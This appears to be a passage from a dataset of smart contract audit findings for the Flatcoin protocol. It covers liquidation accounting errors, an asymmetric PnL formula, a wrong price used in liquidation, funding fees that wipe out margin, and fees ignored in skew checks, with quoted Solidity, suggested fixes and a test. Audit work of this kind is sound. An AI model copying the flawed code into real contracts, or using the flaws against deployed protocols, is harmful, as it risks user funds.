`newMarginDepositedTotal` is $y + 80$, which is incorrect as this indicates that the long trader's pool has gained 80 ETH, which should not be the case when a long position is being liquidated.\\nSecond Example\\nThe current price of rETH is $1000.\\nLet's say there is a user A (Alice) who makes a deposit of 5 rETH as collateral for LP.\\nLet's say another user, Bob (B), comes up, deposits 2 rETH as a margin, and creates a position with a size of 5 rETH, basically creating a perfectly hedged market. Since this is a perfectly hedged market, the accrued funding fee will be zero for the context of this example.\\nTotal collateral in the system = 5 rETH + 2 rETH = 7 rETH\\nAfter some time, the price of rETH drop to $500. As a result, Bob's position is liquidated as its settled margin is less than zero.\\n$$ settleMargin = 2\\ rETH + \\frac{5 \\times (500 - 1000)}{500} = 2\\ rETH - 5\\ rETH = -3\\ rETH $$\\nDuring the liquidation, the following code is executed to update the LP's stable collateral total:\\n```\\nvault.updateStableCollateralTotal(settledMargin - positionSummary.profitLoss);\\nvault.updateStableCollateralTotal(-3 rETH - (-5 rETH));\\nvault.updateStableCollateralTotal(+2);\\n```\\n\\nLP's stable collateral total increased by 2 rETH.\\nSubsequently, the `updateGlobalPositionData` function will be executed.\\n```\\nFile: LiquidationModule.sol\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n..SNIP..\\n vault.updateGlobalPositionData({\\n price: position.lastPrice,\\n marginDelta: -(int256(position.marginDeposited) + positionSummary.accruedFunding),\\n additionalSizeDelta: -int256(position.additionalSize) // Since position is being closed, additionalSizeDelta should be negative.\\n });\\n```\\n\\nWithin the `updateGlobalPositionData` function, the `profitLossTotal` at Line 179 will be -5 rETH. This means that the long trader (Bob) has lost 5 rETH.\\nAt Line 205 below, the PnL of the long traders (-5 rETH) will be transferred to the LP's stable collateral total. In this case, the LPs gain 5 rETH.\\nNote that the LP's stable collateral total has been increased by 2 rETH earlier and now we are increasing it by 5 rETH again. Thus, the total gain by LPs is 7 rETH. If we add 7 rETH to the original stable collateral total, it will be 7 rETH + 5 rETH = 12 rETH. However, this is incorrect because we only have 7 rETH collateral within the system, as shown at the start.\\n```\\nFile: FlatcoinVault.sol\\n function updateGlobalPositionData(\\n uint256 _price,\\n int256 _marginDelta,\\n int256 _additionalSizeDelta\\n ) external onlyAuthorizedModule {\\n // Get the total profit loss and update the margin deposited total.\\n int256 profitLossTotal = PerpMath._profitLossTotal({globalPosition: _globalPositions, price: _price});\\n\\n // Note that technically, even the funding fees should be accounted for when computing the margin deposited total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here.\\n int256 newMarginDepositedTotal = int256(_globalPositions.marginDepositedTotal) + _marginDelta + profitLossTotal;\\n\\n // Check that the sum of margin of all the leverage traders is not negative.\\n // Rounding errors shouldn't result in a negative margin deposited total given that\\n // we are rounding down the profit loss of the position.\\n // If anything, after closing the last position in the system, the `marginDepositedTotal` should can be positive.\\n // The margin may be negative if liquidations are not happening in a timely manner.\\n if (newMarginDepositedTotal < 0) {\\n revert FlatcoinErrors.InsufficientGlobalMargin();\\n }\\n\\n _globalPositions = FlatcoinStructs.GlobalPositions({\\n marginDepositedTotal: uint256(newMarginDepositedTotal),\\n sizeOpenedTotal: (int256(_globalPositions.sizeOpenedTotal) + _additionalSizeDelta).toUint256(),\\n lastPrice: _price\\n });\\n\\n // Profit loss of leverage traders has to be accounted for by adjusting the stable collateral total.\\n // Note that technically, even the funding fees should be accounted for when computing the stable collateral total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here\\n _updateStableCollateralTotal(-profitLossTotal);\\n }\\n```\\n\\nThird Example\\nAt $T0$, the marginDepositedTotal = 70 ETH, stableCollateralTotal = 100 ETH, vault's balance = 170 ETH\\nBob's Long Position Alice (LP)\\nMargin = 70 ETH\\nPosition Size = 500 ETH\\nLeverage = (500 + 20) / 20 = 26x\\nLiquidation Fee = 50 ETH\\nLiquidation Margin = 60 ETH\\nEntry Price = $1000 per ETH Deposited = 100 ETH\\nAt $T1$, the position's settled margin falls to 60 ETH (margin = +70, accrued fee = -5, PnL = -5) and is subjected to liquidation.\\nFirstly, the `settleFundingFees()` function will be executed at the start of the liquidation process. The effect of the `settleFundingFees()` function is shown below. The long trader's `marginDepositedTotal` will be reduced by 5, while the LP's `stableCollateralTotal` will increase by 5.\\n```\\nsettleFundingFees() = Long need to pay short 5\\n\\nmarginDepositedTotal = marginDepositedTotal + funding fee\\nmarginDepositedTotal = 70 + (-5) = 65\\n\\nstableCollateralTotal = 100 + (-(-5)) = 105\\n```\\n\\nNext, this part of the code will be executed to send a portion of the liquidated position's margin to the liquidator and LPs.\\n```\\nsettledMargin > 0 => True\\n(settledMargin > expectedLiquidationFee) => (+60 > +50) => True\\nremainingMargin = uint256(settledMargin) - expectedLiquidationFee = 60 - 50 = 10\\n```\\n\\n50 ETH will be sent to the liquidator and the remaining 10 ETH should goes to the LPs.\\n```\\nvault.updateStableCollateralTotal(remainingMargin - positionSummary.profitLoss) =>\\nstableCollateralTotal = 105 ETH + (remaining margin - PnL)\\nstableCollateralTotal = 105 ETH + (10 ETH - (-5 ETH))\\nstableCollateralTotal = 105 ETH + (15 ETH) = 120 ETH\\n```\\n\\nNext, the `vault.updateGlobalPositionData` function here will be executed.\\n```\\nvault.updateGlobalPositionData({marginDelta: -(position.marginDeposited + positionSummary.accruedFunding)})\\nvault.updateGlobalPositionData({marginDelta: -(70 + (-5))})\\nvault.updateGlobalPositionData({marginDelta: -65})\\n\\nprofitLossTotal = -5\\nnewMarginDepositedTotal = globalPositions.marginDepositedTotal + marginDelta + profitLossTotal\\nnewMarginDepositedTotal = 70 + (-65) + (-5) = 0\\n\\nstableCollateralTotal = stableCollateralTotal + -PnL\\nstableCollateralTotal = 120 + (-(5)) = 125\\n```\\n\\nThe reason why the profitLossTotal = -5 is because there is only one (1) position in the system. So, this loss actually comes from the loss of Bob's position.\\nThe `newMarginDepositedTotal = 0` is correct. This is because the system only has 1 position, which is Bob's position; once the position is liquidated, there should be no margin deposited left in the system.\\nHowever, `stableCollateralTotal = 125` is incorrect. Because the vault's collateral balance now is 170 - 50 (send to liquidator) = 120. Thus, the tracked balance and actual collateral balance are not in sync.
To remediate the issue, the `profitLossTotal` should be excluded within the `updateGlobalPositionData` function during liquidation.\\n```\\n// Remove the line below\\n profitLossTotal = PerpMath._profitLossTotal(// rest of code)\\n\\n// Remove the line below\\n newMarginDepositedTotal = globalPositions.marginDepositedTotal // Add the line below\\n _marginDelta // Add the line below\\n profitLossTotal\\n// Add the line below\\n newMarginDepositedTotal = globalPositions.marginDepositedTotal // Add the line below\\n _marginDelta\\n\\nif (newMarginDepositedTotal < 0) {\\n revert FlatcoinErrors.InsufficientGlobalMargin();\\n}\\n\\n_globalPositions = FlatcoinStructs.GlobalPositions({\\n marginDepositedTotal: uint256(newMarginDepositedTotal),\\n sizeOpenedTotal: (int256(_globalPositions.sizeOpenedTotal) // Add the line below\\n _additionalSizeDelta).toUint256(),\\n lastPrice: _price\\n});\\n \\n// Remove the line below\\n _updateStableCollateralTotal(// Remove the line below\\nprofitLossTotal);\\n```\\n\\nThe existing `updateGlobalPositionData` function still needs to be used for other functions besides liquidation. As such, consider creating a separate new function (e.g., updateGlobalPositionDataDuringLiquidation) solely for use during the liquidation that includes the above fixes.\\nThe following attempts to apply the above fix to the three (3) examples described in the report to verify that it is working as intended.\\nFirst Example\\nLet the current `StableCollateralTotal` be $x$ and `marginDepositedTotal` be $y$ at the start of the liquidation.\\nDuring funding settlement:\\nStableCollateralTotal = $x$ + 100\\nmarginDepositedTotal = $y$ - 100\\nDuring updateStableCollateralTotal:\\n```\\nvault.updateStableCollateralTotal(int256(remainingMargin) - positionSummary.profitLoss);\\nvault.updateStableCollateralTotal(0 - (+100));\\nvault.updateStableCollateralTotal(-100);\\n```\\n\\nStableCollateralTotal = ($x$ + 100) - 100 = $x$\\nDuring Global Position Update:\\nmarginDelta = -(position.marginDeposited + positionSummary.accruedFunding) = -(20 + (-100)) = 80\\nnewMarginDepositedTotal = marginDepositedTotal + marginDelta = ($y$ - 100) + 80 = ($y$ - 20)\\nNo change to StableCollateralTotal here. Remain at $x$\\nConclusion:\\nThe LPs should not gain or lose in this scenario. Thus, the fact that the StableCollateralTotal remains as $x$ before and after the liquidation is correct.\\nThe `marginDepositedTotal` is ($y$ - 20) is correct because the liquidated position's remaining margin is 20 ETH. Thus, when this position is liquidated, 20 ETH should be deducted from the `marginDepositedTotal`\\nNo revert during the execution.\\nSecond Example\\nDuring updateStableCollateralTotal:\\n```\\nvault.updateStableCollateralTotal(settledMargin - positionSummary.profitLoss);\\nvault.updateStableCollateralTotal(-3 rETH - (-5 rETH));\\nvault.updateStableCollateralTotal(+2);\\n```\\n\\nStableCollateralTotal = 5 + 2 = 7 ETH\\nDuring Global Position Update:\\nmarginDelta = -(position.marginDeposited + positionSummary.accruedFunding) = -(2 + 0) = -2\\nmarginDepositedTotal = marginDepositedTotal + marginDelta = 2 + (-2) = 0\\nConclusion:\\nStableCollateralTotal = 7 ETH, marginDepositedTotal = 0 (Total 7 ETH tracked in the system)\\nBalance of collateral in the system = 7 ETH. Thus, both values are in sync. No revert.\\nThird Example\\nDuring funding settlement (Transfer 5 from Long to LP):\\nmarginDepositedTotal = 70 + (-5) = 65\\nStableCollateralTotal = 100 + 5 = 105\\nTransfer fee to Liquidator\\n50 ETH sent to the liquidator from the system: Balance of collateral in the system = 170 ETH - 50 ETH = 120 ETH\\nDuring updateStableCollateralTotal:\\n```\\nvault.updateStableCollateralTotal(remainingMargin - positionSummary.profitLoss) =>\\nstableCollateralTotal = 105 ETH + (remaining margin - PnL)\\nstableCollateralTotal = 105 ETH + (10 ETH - (-5 ETH))\\nstableCollateralTotal = 105 ETH + (15 ETH) = 120 ETH\\n```\\n\\nStableCollateralTotal = 120 ETH\\nDuring Global Position Update:\\nmarginDelta= -(position.marginDeposited + positionSummary.accruedFunding) = -(70 + (-5)) = -65\\nmarginDepositedTotal = 65 + (-65) = 0\\nConclusion:\\nStableCollateralTotal = 120 ETH, marginDepositedTotal = 0 (Total 120 ETH tracked in the system)\\nBalance of collateral in the system = 120 ETH. Thus, both values are in sync. No revert.
The following is a list of potential impacts of this issue:\\nFirst Example: LPs incur unnecessary losses during liquidation, which would be avoidable if the calculations were correctly implemented from the start.\\nSecond Example: An error in the protocol's accounting mechanism led to an inflated increase in the LPs' stable collateral total, which in turn inflated the number of tokens users can withdraw from the system.\\nThird Example: The accounting error led to the tracked balance and actual collateral balance not being in sync.
```\\nsettleFundingFees() = Short/LP need to pay Long 100\\n\\nmarginDepositedTotal = marginDepositedTotal + funding fee\\nmarginDepositedTotal = y + (-100) = (y - 100)\\n\\nstableCollateralTotal = x + (-(-100)) = (x + 100)\\n```\\n
Asymmetry in profit and loss (PnL) calculations
high
An asymmetry arises in profit and loss (PnL) calculations due to relative price changes. This discrepancy emerges when adjustments to a position lead to differing PnL outcomes despite equivalent absolute price shifts in rETH, leading to loss of assets.\\nScenario 1\\nAssume at $T0$, the price of rETH is $1000. Bob opened a long position with the following state:\\nPosition Size = 40 ETH\\nMargin = $x$ ETH\\nAt $T2$, the price of rETH increased to $2000. Thus, Bob's PnL is as follows: he gains 20 rETH.\\n```\\nPnL = Position Size * Price Shift / Current Price\\nPnL = Position Size * (Current Price - Last Price) / Current Price\\nPnL = 40 rETH * ($2000 - $1000) / $2000\\nPnL = $40000 / $2000 = 20 rETH\\n```\\n\\nImportant Note: In terms of dollars, each ETH earns $1000. Since the position held 40 ETH, the position gained $40000.\\nScenario 2\\nAssume at $T0$, the price of rETH is $1000. Bob opened a long position with the following state:\\nPosition Size = 40 ETH\\nMargin = $x$ ETH\\nAt $T1$, the price of rETH dropped to $500. An adjustment is executed against Bob's long position, and a `newMargin` is computed to account for the PnL accrued till now, as shown in Line 191 below. Thus, Bob's PnL is as follows: he lost 40 rETH.\\n```\\nPnL = Position Size * Price Shift / Current Price\\nPnL = Position Size * (Current Price - Last Price) / Current Price\\nPnL = 40 rETH * ($500 - $1000) / $500\\nPnL = -$20000 / $500 = -40 rETH\\n```\\n\\nAt this point, the position's `marginDeposited` will be $(x - 40)\\ rETH$ and `lastPrice` set to $500.\\nImportant Note 1: In terms of dollars, each ETH lost $500. Since the position held 40 ETH, the position lost $20000\\n```\\nFile: LeverageModule.sol\\n // This accounts for the profit loss and funding fees accrued till now.\\n uint256 newMargin = (marginAdjustment +\\n PerpMath\\n ._getPositionSummary({position: position, nextFundingEntry: cumulativeFunding, price: adjustPrice})\\n .marginAfterSettlement).toUint256();\\n..SNIP..\\n vault.setPosition(\\n FlatcoinStructs.Position({\\n lastPrice: adjustPrice,\\n marginDeposited: newMargin,\\n additionalSize: newAdditionalSize,\\n entryCumulativeFunding: cumulativeFunding\\n }),\\n announcedAdjust.tokenId\\n );\\n```\\n\\nAt $T2$, the price of rETH increases from $500 to $2000. Thus, Bob's PnL is as follows:\\n```\\nPnL = Position Size * Price Shift / Current Price\\nPnL = Position Size * (Current Price - Last Price) / Current Price\\nPnL = 40 rETH * ($2000 - $500) / $500\\nPnL = $60000 / $2000 = 30 rETH\\n```\\n\\nAt this point, the position's `marginDeposited` will be $(x - 40 + 30)\\ rETH$, which is equal to $(x - 10)\\ rETH$. This effectively means that Bob has lost 10 rETH of the total margin he deposited.\\nImportant Note 2: In terms of dollars, each ETH gains $1500. Since the position held 40 ETH, the position gained $60000.\\nImportant Note 3: If we add up the loss of $20000 at 𝑇1 and the gain of $60000 at 𝑇2, the overall PnL is a gain of $40000 at the end.\\nAnalysis\\nThe final PnL of a position should be equivalent regardless of the number of adjustments/position updates made between $T0$ and $T2$. However, the current implementation does not conform to this property. Bob gains 20 rETH in the first scenario, while Bob loses 10 rETH in the second scenario.\\nThere are several reasons that lead to this issue:\\nThe PnL calculation emphasizes relative price changes (percentage) rather than absolute price changes (dollar value). This leads to asymmetric rETH outcomes for the same absolute dollar gains/losses. If we have used the dollar to compute the PnL, both scenarios will return the same correct result, with a gain of $40000 at the end, as shown in the examples above. (Refer to the important note above)\\nThe formula for PnL calculation is sensitive to the proportion of the price change relative to the current price. This causes the rETH gains/losses to be non-linear even when the absolute dollar gains/losses are the same.\\nExtra Example\\nThe current approach to computing the PnL will also cause issues in another area besides the one shown above. The following example aims to demonstrate that it can cause a desync between the PnL accumulated by the global positions AND the PnL of all the individual open positions in the system.\\nThe following shows the two open positions owned by Alice and Bob. The current price of ETH is $1000 and the current time is $T0$\\nAlice's Long Position Bob's Long Position\\nPosition Size = 100 ETH\\nEntry Price = $1000 Position Size = 50 ETH\\nEntry Price = $1000\\nAt $T1$, the price of ETH drops from $1000 to $750, and the `updateGlobalPositionData` function is executed. The `profitLossTotal` is computed as below. Thus, the `marginDepositedTotal` decreased by 50 ETH.\\n```\\npriceShift = $750 - $1000 = -$250\\nprofitLossTotal = (globalPosition.sizeOpenedTotal * priceShift) / price\\nprofitLossTotal = (150 ETH * -$250) / $750 = -50 ETH\\n```\\n\\nAt $T2$, the price of ETH drops from $750 to $500, and the `updateGlobalPositionData` function is executed. The `profitLossTotal` is computed as below. Thus, the `marginDepositedTotal` decreased by 75 ETH.\\n```\\npriceShift = $500 - $750 = -$250\\nprofitLossTotal = (globalPosition.sizeOpenedTotal * priceShift) / price\\nprofitLossTotal = (150 ETH * -$250) / $500 = -75 ETH\\n```\\n\\nIn total, the `marginDepositedTotal` decreased by 125 ETH (50 + 75), which means that the long traders lost 125 ETH from $T0$ to $T2$.\\nHowever, when we compute the loss of Alice and Bob's positions at $T2$, they lost a total of 150 ETH, which deviated from the loss of 125 ETH in the global position data.\\n```\\nAlice's PNL\\npriceShift = current price - entry price = $500 - $1000 = -$500\\nPnL = (position size * priceShift) / current price\\nPnL = (100 ETH * -$500) / $500 = -100 ETH\\n\\nBob's PNL\\npriceShift = current price - entry price = $500 - $1000 = -$500\\nPnL = (position size * priceShift) / current price\\nPnL = (50 ETH * -$500) / $500 = -50 ETH\\n```\\n
Consider tracking the PnL in dollar value/term to ensure consistency between the rETH and dollar representations of gains and losses.\\nAppendix\\nCompared to SNX V2, it is not vulnerable to this issue. The reason is that in SNX V2 when it computes the PnL, it does not "scale" down the result by the price. The PnL in SNXv2 is simply computed in dollar value ($positionSize \\times priceShift$), while FlatCoin protocol computes in collateral (rETH) term ($\\frac{positionSize \\times priceShift}{price}$).\\n```\\nfunction _profitLoss(Position memory position, uint price) internal pure returns (int pnl) {\\n int priceShift = int(price).sub(int(position.lastPrice));\\n return int(position.size).multiplyDecimal(priceShift);\\n}\\n```\\n\\n```\\n/*\\n * The initial margin of a position, plus any PnL and funding it has accrued. The resulting value may be negative.\\n */\\nfunction _marginPlusProfitFunding(Position memory position, uint price) internal view returns (int) {\\n int funding = _accruedFunding(position, price);\\n return int(position.margin).add(_profitLoss(position, price)).add(funding);\\n}\\n```\\n
Loss of assets, as demonstrated in the second scenario in the first example above. The tracking of profit and loss, which is the key component within the protocol, both on the position level and global level, is broken.
```\\nPnL = Position Size * Price Shift / Current Price\\nPnL = Position Size * (Current Price - Last Price) / Current Price\\nPnL = 40 rETH * ($2000 - $1000) / $2000\\nPnL = $40000 / $2000 = 20 rETH\\n```\\n
Incorrect price used when updating the global position data
high
Incorrect price used when updating the global position data leading to a loss of assets for LPs.\\nNear the end of the liquidation process, the `updateGlobalPositionData` function at Line 159 will be executed to update the global position data. However, when executing the `updateGlobalPositionData` function, the code sets the price at Line 160 below to the position's last price (position.lastPrice), which is incorrect. The price should be set to the current price instead, and not the position's last price.\\n```\\nFile: LiquidationModule.sol\\n /// @notice Function to liquidate a position.\\n /// @dev One could directly call this method instead of `liquidate(uint256, bytes[])` if they don't want to update the Pyth price.\\n /// @param tokenId The token ID of the leverage position.\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n FlatcoinStructs.Position memory position = vault.getPosition(tokenId);\\n\\n (uint256 currentPrice, ) = IOracleModule(vault.moduleAddress(FlatcoinModuleKeys._ORACLE_MODULE_KEY)).getPrice();\\n\\n // Settle funding fees accrued till now.\\n vault.settleFundingFees();\\n\\n // Check if the position can indeed be liquidated.\\n if (!canLiquidate(tokenId)) revert FlatcoinErrors.CannotLiquidate(tokenId);\\n\\n FlatcoinStructs.PositionSummary memory positionSummary = PerpMath._getPositionSummary(\\n position,\\n vault.cumulativeFundingRate(),\\n currentPrice\\n );\\n..SNIP..\\n vault.updateGlobalPositionData({\\n price: position.lastPrice,\\n marginDelta: -(int256(position.marginDeposited) + positionSummary.accruedFunding),\\n additionalSizeDelta: -int256(position.additionalSize) // Since position is being closed, additionalSizeDelta should be negative.\\n });\\n```\\n\\nThe reason why the `updateGlobalPositionData` function expects a current price to be passed in is that within the `PerpMath._profitLossTotal` function, it will compute the price shift between the current price and the last price to obtain the PnL of all the open positions. Also, per the comment at Line 170 below, it expects the current price of the collateral to be passed in.\\nThus, it is incorrect to pass in the individual position's last/entry price, which is usually the price of the collateral when the position was first opened or adjusted some time ago.\\nThus, if the last/entry price of the liquidated position is higher than the current price of collateral, the PnL will be inflated, indicating more gain for the long traders. Since this is a zero-sum game, this also means that the LP loses more assets than expected due to the inflated gain of the long traders.\\n```\\nFile: FlatcoinVault.sol\\n /// @notice Function to update the global position data.\\n /// @dev This function is only callable by the authorized modules.\\n /// @param _price The current price of the underlying asset.\\n /// @param _marginDelta The change in the margin deposited total.\\n /// @param _additionalSizeDelta The change in the size opened total.\\n function updateGlobalPositionData(\\n uint256 _price,\\n int256 _marginDelta,\\n int256 _additionalSizeDelta\\n ) external onlyAuthorizedModule {\\n // Get the total profit loss and update the margin deposited total.\\n int256 profitLossTotal = PerpMath._profitLossTotal({globalPosition: _globalPositions, price: _price});\\n\\n // Note that technically, even the funding fees should be accounted for when computing the margin deposited total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here.\\n int256 newMarginDepositedTotal = int256(_globalPositions.marginDepositedTotal) + _marginDelta + profitLossTotal;\\n\\n // Check that the sum of margin of all the leverage traders is not negative.\\n // Rounding errors shouldn't result in a negative margin deposited total given that\\n // we are rounding down the profit loss of the position.\\n // If anything, after closing the last position in the system, the `marginDepositedTotal` should can be positive.\\n // The margin may be negative if liquidations are not happening in a timely manner.\\n if (newMarginDepositedTotal < 0) {\\n revert FlatcoinErrors.InsufficientGlobalMargin();\\n }\\n\\n _globalPositions = FlatcoinStructs.GlobalPositions({\\n marginDepositedTotal: uint256(newMarginDepositedTotal),\\n sizeOpenedTotal: (int256(_globalPositions.sizeOpenedTotal) + _additionalSizeDelta).toUint256(),\\n lastPrice: _price\\n });\\n```\\n
Use the current price instead of liquidated position's last price when update the global position data\\n```\\n(uint256 currentPrice, ) = IOracleModule(vault.moduleAddress(FlatcoinModuleKeys._ORACLE_MODULE_KEY)).getPrice();\\n..SNIP..\\nvault.updateGlobalPositionData({\\n// Remove the line below\\n price: position.lastPrice,\\n// Add the line below\\n price: currentPrice, \\n marginDelta: // Remove the line below\\n(int256(position.marginDeposited) // Add the line below\\n positionSummary.accruedFunding),\\n additionalSizeDelta: // Remove the line below\\nint256(position.additionalSize) // Since position is being closed, additionalSizeDelta should be negative.\\n});\\n```\\n
Loss of assets for the LP as mentioned in the above section.
```\\nFile: LiquidationModule.sol\\n /// @notice Function to liquidate a position.\\n /// @dev One could directly call this method instead of `liquidate(uint256, bytes[])` if they don't want to update the Pyth price.\\n /// @param tokenId The token ID of the leverage position.\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n FlatcoinStructs.Position memory position = vault.getPosition(tokenId);\\n\\n (uint256 currentPrice, ) = IOracleModule(vault.moduleAddress(FlatcoinModuleKeys._ORACLE_MODULE_KEY)).getPrice();\\n\\n // Settle funding fees accrued till now.\\n vault.settleFundingFees();\\n\\n // Check if the position can indeed be liquidated.\\n if (!canLiquidate(tokenId)) revert FlatcoinErrors.CannotLiquidate(tokenId);\\n\\n FlatcoinStructs.PositionSummary memory positionSummary = PerpMath._getPositionSummary(\\n position,\\n vault.cumulativeFundingRate(),\\n currentPrice\\n );\\n..SNIP..\\n vault.updateGlobalPositionData({\\n price: position.lastPrice,\\n marginDelta: -(int256(position.marginDeposited) + positionSummary.accruedFunding),\\n additionalSizeDelta: -int256(position.additionalSize) // Since position is being closed, additionalSizeDelta should be negative.\\n });\\n```\\n
Long trader's deposited margin can be wiped out
high
Long Trader's deposited margin can be wiped out due to a logic error, leading to a loss of assets.\\n```\\nFile: FlatcoinVault.sol\\n function settleFundingFees() public returns (int256 _fundingFees) {\\n..SNIP..\\n // Calculate the funding fees accrued to the longs.\\n // This will be used to adjust the global margin and collateral amounts.\\n _fundingFees = PerpMath._accruedFundingTotalByLongs(_globalPositions, unrecordedFunding);\\n\\n // In the worst case scenario that the last position which remained open is underwater,\\n // we set the margin deposited total to 0. We don't want to have a negative margin deposited total.\\n _globalPositions.marginDepositedTotal = (int256(_globalPositions.marginDepositedTotal) > _fundingFees)\\n ? uint256(int256(_globalPositions.marginDepositedTotal) + _fundingFees)\\n : 0;\\n\\n _updateStableCollateralTotal(-_fundingFees);\\n```\\n\\nIssue 1\\nAssume that there are two long positions in the system and the `_globalPositions.marginDepositedTotal` is $X$.\\nAssume that the funding fees accrued to the long positions at Line 228 is $Y$. $Y$ is a positive value indicating the overall gain/profit that the long traders received from the LPs.\\nIn this case, the `_globalPositions.marginDepositedTotal` should be set to $(X + Y)$ after taking into consideration the funding fee gain/profit accrued by the long positions.\\nHowever, in this scenario, $X < Y$. Thus, the condition at Line 232 will be evaluated as `false,` and the `_globalPositions.marginDepositedTotal` will be set to zero. This effectively wipes out all the margin collateral deposited by the long traders in the system, and the deposited margin of the long traders is lost.\\nIssue 2\\nThe second issue with the current implementation is that it does not accurately capture scenarios where the addition of `_globalPositions.marginDepositedTotal` and `_fundingFees` result in a negative number. This is because `_fundingFees` could be a large negative number that, when added to `_globalPositions.marginDepositedTotal`, results in a negative total, but the condition at Line 232 above still evaluates as true, resulting in an underflow revert.
If the intention is to ensure that `_globalPositions.marginDepositedTotal` will never become negative, consider summing up $(X + Y)$ first and determine if the result is less than zero. If yes, set the `_globalPositions.marginDepositedTotal` to zero.\\nThe following is the pseudocode:\\n```\\nnewMarginTotal = globalPositions.marginDepositedTota + _fundingFees;\\nglobalPositions.marginDepositedTotal = newMarginTotal > 0 ? uint256(newMarginTotal) : 0;\\n```\\n
Loss of assets for the long traders as mentioned above.
```\\nFile: FlatcoinVault.sol\\n function settleFundingFees() public returns (int256 _fundingFees) {\\n..SNIP..\\n // Calculate the funding fees accrued to the longs.\\n // This will be used to adjust the global margin and collateral amounts.\\n _fundingFees = PerpMath._accruedFundingTotalByLongs(_globalPositions, unrecordedFunding);\\n\\n // In the worst case scenario that the last position which remained open is underwater,\\n // we set the margin deposited total to 0. We don't want to have a negative margin deposited total.\\n _globalPositions.marginDepositedTotal = (int256(_globalPositions.marginDepositedTotal) > _fundingFees)\\n ? uint256(int256(_globalPositions.marginDepositedTotal) + _fundingFees)\\n : 0;\\n\\n _updateStableCollateralTotal(-_fundingFees);\\n```\\n
Fees are ignored when checks skew max in Stable Withdrawal / Leverage Open / Leverage Adjust
medium
Fees are ignored when checks skew max in Stable Withdrawal / Leverage Open / Leverage Adjust.\\nWhen user withdrawal from the stable LP, vault total stable collateral is updated:\\n```\\n vault.updateStableCollateralTotal(-int256(_amountOut));\\n```\\n\\nThen _withdrawFee is calculated and checkSkewMax(...) function is called to ensure that the system will not be too skewed towards longs:\\n```\\n // Apply the withdraw fee if it's not the final withdrawal.\\n _withdrawFee = (stableWithdrawFee * _amountOut) / 1e18;\\n\\n // additionalSkew = 0 because withdrawal was already processed above.\\n vault.checkSkewMax({additionalSkew: 0});\\n```\\n\\nAt the end of the execution, vault collateral is settled again with withdrawFee, keeper receives keeperFee and `(amountOut - totalFee)` amount of collaterals are transferred to the user:\\n```\\n // include the fees here to check for slippage\\n amountOut -= totalFee;\\n\\n if (amountOut < stableWithdraw.minAmountOut)\\n revert FlatcoinErrors.HighSlippage(amountOut, stableWithdraw.minAmountOut);\\n\\n // Settle the collateral\\n vault.updateStableCollateralTotal(int256(withdrawFee)); // pay the withdrawal fee to stable LPs\\n vault.sendCollateral({to: msg.sender, amount: order.keeperFee}); // pay the keeper their fee\\n vault.sendCollateral({to: account, amount: amountOut}); // transfer remaining amount to the trader\\n```\\n\\nThe `totalFee` is composed of keeper fee and withdrawal fee:\\n```\\n uint256 totalFee = order.keeperFee + withdrawFee;\\n```\\n\\nThis means withdrawal fee is still in the vault, however this fee is ignored when checks skew max and protocol may revert on a safe withdrawal. Consider the following scenario:\\nskewFractionMax is `120%` and stableWithdrawFee is 1%;\\nAlice deposits `100` collateral and Bob opens a leverage position with size 100;\\nAt the moment, there is `100` collaterals in the Vault, skew is `0` and skew fraction is 100%;\\nAlice tries to withdraw `16.8` collaterals, withdrawFee is `0.168`, after withdrawal, it is expected that there is `83.368` stable collaterals in the Vault, so skewFraction should be `119.5%`, which is less than skewFractionMax;\\nHowever, the withdrawal will actually fail because when protocol checks skew max, withdrawFee is ignored and the skewFraction turns out to be `120.19%`, which is higher than skewFractionMax.\\nThe same issue may occur when protocol executes a leverage open and leverage adjust, in both executions, tradeFee is ignored when checks skew max.\\nPlease see the test codes:\\n```\\n function test_audit_withdraw_fee_ignored_when_checks_skew_max() public {\\n // skewFractionMax is 120%\\n uint256 skewFractionMax = vaultProxy.skewFractionMax();\\n assertEq(skewFractionMax, 120e16);\\n\\n // withdraw fee is 1%\\n vm.prank(vaultProxy.owner());\\n stableModProxy.setStableWithdrawFee(1e16);\\n\\n uint256 collateralPrice = 1000e8;\\n\\n uint256 depositAmount = 100e18;\\n announceAndExecuteDeposit({\\n traderAccount: alice,\\n keeperAccount: keeper,\\n depositAmount: depositAmount,\\n oraclePrice: collateralPrice,\\n keeperFeeAmount: 0\\n });\\n\\n uint256 additionalSize = 100e18;\\n announceAndExecuteLeverageOpen({\\n traderAccount: bob,\\n keeperAccount: keeper,\\n margin: 50e18,\\n additionalSize: 100e18,\\n oraclePrice: collateralPrice,\\n keeperFeeAmount: 0\\n });\\n\\n // After leverage Open, skew is 0\\n int256 skewAfterLeverageOpen = vaultProxy.getCurrentSkew();\\n assertEq(skewAfterLeverageOpen, 0);\\n // skew fraction is 100%\\n uint256 skewFractionAfterLeverageOpen = getLongSkewFraction();\\n assertEq(skewFractionAfterLeverageOpen, 1e18);\\n\\n // Note: comment out `vault.checkSkewMax({additionalSkew: 0})` and below lines to see the actual skew fraction\\n // Alice withdraws 16.8 collateral\\n // uint256 aliceLpBalance = stableModProxy.balanceOf(alice);\\n // announceAndExecuteWithdraw({\\n // traderAccount: alice, \\n // keeperAccount: keeper, \\n // withdrawAmount: 168e17, \\n // oraclePrice: collateralPrice, \\n // keeperFeeAmount: 0\\n // });\\n\\n // // After withdrawal, the actual skew fraction is 119.9%, less than skewFractionMax\\n // uint256 skewFactionAfterWithdrawal = getLongSkewFraction();\\n // assertEq(skewFactionAfterWithdrawal, 1199501007580846367);\\n\\n // console2.log(WETH.balanceOf(address(vaultProxy)));\\n }\\n```\\n
Include withdrawal fee / trade fee when check skew max.
Protocol may wrongly prevent a Stable Withdrawal / Leverage Open / Leverage Adjust even if the execution is essentially safe.
```\\n vault.updateStableCollateralTotal(-int256(_amountOut));\\n```\\n
In LeverageModule.executeOpen/executeAdjust, vault.checkSkewMax should be called after updating the global position data
medium
